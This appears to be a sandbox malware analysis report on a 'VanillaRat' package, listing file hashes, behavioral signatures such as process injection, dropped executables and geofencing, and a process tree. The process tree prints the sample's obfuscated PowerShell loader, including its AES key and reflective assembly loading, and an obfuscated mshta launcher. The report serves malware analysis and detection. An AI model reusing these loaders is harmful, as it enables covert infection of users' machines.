Overview
overview
10Static
static
10VanillaRat...er.bat
windows7-x64
7VanillaRat...er.bat
windows10-2004-x64
10VanillaRat...at.exe
windows7-x64
10VanillaRat...at.exe
windows10-2004-x64
1VanillaRat...ub.exe
windows7-x64
10VanillaRat...ub.exe
windows10-2004-x64
10VanillaRat/Start.bat
windows7-x64
7VanillaRat/Start.bat
windows10-2004-x64
10Analysis
-
max time kernel
38s -
max time network
41s -
platform
windows10-2004_x64 -
resource
win10v2004-20231023-en -
resource tags
arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system -
submitted
01-11-2023 11:02
Behavioral task
behavioral1
Sample
VanillaRat/Handlers/HandlerInstaller.bat
Resource
win7-20231020-en
Behavioral task
behavioral2
Sample
VanillaRat/Handlers/HandlerInstaller.bat
Resource
win10v2004-20231020-en
Behavioral task
behavioral3
Sample
VanillaRat/Main/VanillaRat.exe
Resource
win7-20231023-en
Behavioral task
behavioral4
Sample
VanillaRat/Main/VanillaRat.exe
Resource
win10v2004-20231023-en
Behavioral task
behavioral5
Sample
VanillaRat/Main/VanillaStub.exe
Resource
win7-20231023-en
Behavioral task
behavioral6
Sample
VanillaRat/Main/VanillaStub.exe
Resource
win10v2004-20231025-en
Behavioral task
behavioral7
Sample
VanillaRat/Start.bat
Resource
win7-20231020-en
Behavioral task
behavioral8
Sample
VanillaRat/Start.bat
Resource
win10v2004-20231023-en
General
-
Target
VanillaRat/Start.bat
-
Size
3KB
-
MD5
78d817fe7349683c207f17c0b4774484
-
SHA1
9dc66330a6aef8e8678b45ac3fa79091f2f50ccc
-
SHA256
b7ddf09d72ad1671da5c5ad5bf0e5d22ac6f4fee8cedd04f188a9e109e8b86f6
-
SHA512
77e0bdc2d0faa24d4f4ff42059f8b002b7214300fd7f44b07d76fb042b111a1ad85e2b32e1032942aaf29bed11efe17a73e623cafd777ec21e603118e70d2699
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
HandlerInstaller.bat.exedescription pid process target process PID 3340 created 608 3340 HandlerInstaller.bat.exe winlogon.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
$sxr-mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation $sxr-mshta.exe -
Executes dropped EXE 2 IoCs
Processes:
HandlerInstaller.bat.exe$sxr-mshta.exepid process 3340 HandlerInstaller.bat.exe 112 $sxr-mshta.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
HandlerInstaller.bat.exedescription pid process target process PID 3340 set thread context of 4480 3340 HandlerInstaller.bat.exe dllhost.exe PID 3340 set thread context of 4500 3340 HandlerInstaller.bat.exe dllhost.exe -
Drops file in Windows directory 6 IoCs
Processes:
HandlerInstaller.bat.exedescription ioc process File created C:\Windows\$sxr-powershell.exe HandlerInstaller.bat.exe File opened for modification C:\Windows\$sxr-powershell.exe HandlerInstaller.bat.exe File created C:\Windows\$sxr-mshta.exe HandlerInstaller.bat.exe File opened for modification C:\Windows\$sxr-mshta.exe HandlerInstaller.bat.exe File created C:\Windows\$sxr-cmd.exe HandlerInstaller.bat.exe File opened for modification C:\Windows\$sxr-cmd.exe HandlerInstaller.bat.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
$sxr-mshta.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ $sxr-mshta.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exeHandlerInstaller.bat.exedllhost.exepid process 4844 powershell.exe 4844 powershell.exe 3340 HandlerInstaller.bat.exe 3340 HandlerInstaller.bat.exe 3340 HandlerInstaller.bat.exe 3340 HandlerInstaller.bat.exe 4500 dllhost.exe 4500 dllhost.exe 4500 dllhost.exe 4500 dllhost.exe 3340 HandlerInstaller.bat.exe 3340 HandlerInstaller.bat.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exeHandlerInstaller.bat.exedllhost.exedescription pid process Token: SeDebugPrivilege 4844 powershell.exe Token: SeDebugPrivilege 3340 HandlerInstaller.bat.exe Token: SeDebugPrivilege 3340 HandlerInstaller.bat.exe Token: SeDebugPrivilege 4500 dllhost.exe -
Suspicious use of WriteProcessMemory 25 IoCs
Processes:
cmd.exepowershell.execmd.exeHandlerInstaller.bat.exedescription pid process target process PID 2776 wrote to memory of 1136 2776 cmd.exe VanillaRat.exe PID 2776 wrote to memory of 1136 2776 cmd.exe VanillaRat.exe PID 2776 wrote to memory of 1136 2776 cmd.exe VanillaRat.exe PID 2776 wrote to memory of 4844 2776 cmd.exe powershell.exe PID 2776 wrote to memory of 4844 2776 cmd.exe powershell.exe PID 4844 wrote to memory of 3344 4844 powershell.exe cmd.exe PID 4844 wrote to memory of 3344 4844 powershell.exe cmd.exe PID 3344 wrote to memory of 3340 3344 cmd.exe HandlerInstaller.bat.exe PID 3344 wrote to memory of 3340 3344 cmd.exe HandlerInstaller.bat.exe PID 3340 wrote to memory of 4480 3340 HandlerInstaller.bat.exe dllhost.exe PID 3340 wrote to memory of 4480 3340 HandlerInstaller.bat.exe dllhost.exe PID 3340 wrote to memory of 4480 3340 HandlerInstaller.bat.exe dllhost.exe PID 3340 wrote to memory of 4480 3340 HandlerInstaller.bat.exe dllhost.exe PID 3340 wrote to memory of 4480 3340 HandlerInstaller.bat.exe dllhost.exe PID 3340 wrote to memory of 4480 3340 HandlerInstaller.bat.exe dllhost.exe PID 3340 wrote to memory of 4480 3340 HandlerInstaller.bat.exe dllhost.exe PID 3340 wrote to memory of 4500 3340 HandlerInstaller.bat.exe dllhost.exe PID 3340 wrote to memory of 4500 3340 HandlerInstaller.bat.exe dllhost.exe PID 3340 wrote to memory of 4500 3340 HandlerInstaller.bat.exe dllhost.exe PID 3340 wrote to memory of 4500 3340 HandlerInstaller.bat.exe dllhost.exe PID 3340 wrote to memory of 4500 3340 HandlerInstaller.bat.exe dllhost.exe PID 3340 wrote to memory of 4500 3340 HandlerInstaller.bat.exe dllhost.exe PID 3340 wrote to memory of 4500 3340 HandlerInstaller.bat.exe dllhost.exe PID 3340 wrote to memory of 4500 3340 HandlerInstaller.bat.exe dllhost.exe PID 3340 wrote to memory of 4500 3340 HandlerInstaller.bat.exe dllhost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:608
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{530cdb18-0153-4c86-932a-67da7ab8d141}2⤵PID:4480
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\VanillaRat\Start.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaRat.exeMain\\VanillaRat.exe2⤵PID:1136
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -command "& {Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\VanillaRat\\\Handlers\\HandlerInstaller.bat' -WindowStyle Hidden -Wait}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4844 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:3344 -
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe"HandlerInstaller.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function VROas($YFEKm){ $EnJnq=[System.Security.Cryptography.Aes]::Create(); $EnJnq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $EnJnq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $EnJnq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+mgHoM3Dd8LE9FhelB1+E49NCwweh3qyJF1GxhCe+k0='); $EnJnq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wwm30jhzkHC4/5SnlEDZGA=='); $pWYkp=$EnJnq.CreateDecryptor(); $return_var=$pWYkp.TransformFinalBlock($YFEKm, 0, $YFEKm.Length); $pWYkp.Dispose(); $EnJnq.Dispose(); $return_var;}function XcsVC($YFEKm){ $zQqyq=New-Object System.IO.MemoryStream(,$YFEKm); $emglC=New-Object System.IO.MemoryStream; $RGlqr=New-Object System.IO.Compression.GZipStream($zQqyq, [IO.Compression.CompressionMode]::Decompress); $RGlqr.CopyTo($emglC); $RGlqr.Dispose(); $zQqyq.Dispose(); $emglC.Dispose(); $emglC.ToArray();}function dnTmn($YFEKm,$CaEDQ){ $NmIfY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$YFEKm); $bqkrl=$NmIfY.EntryPoint; $bqkrl.Invoke($null, $CaEDQ);}$lpRaC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat').Split([Environment]::NewLine);foreach ($aneut in $lpRaC) { if ($aneut.StartsWith('SEROXEN')) { $zZPSp=$aneut.Substring(7); break; }}$jGZnr=[string[]]$zZPSp.Split('\');$yHwYZ=XcsVC (VROas ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jGZnr[0])));$QcHAi=XcsVC (VROas ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jGZnr[1])));dnTmn $QcHAi (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dnTmn $yHwYZ (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3340 -
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{b562c91e-0607-4472-84bd-d9a885919306}5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4500
-
-
-
-
-
C:\Windows\$sxr-mshta.exeC:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-MkCCpgMZesGBgQjTHDjR4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"1⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:112 -
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /c %$sxr-MkCCpgMZesGBgQjTHDjR4312:&#<?=%2⤵PID:692
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
Filesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
-
Filesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b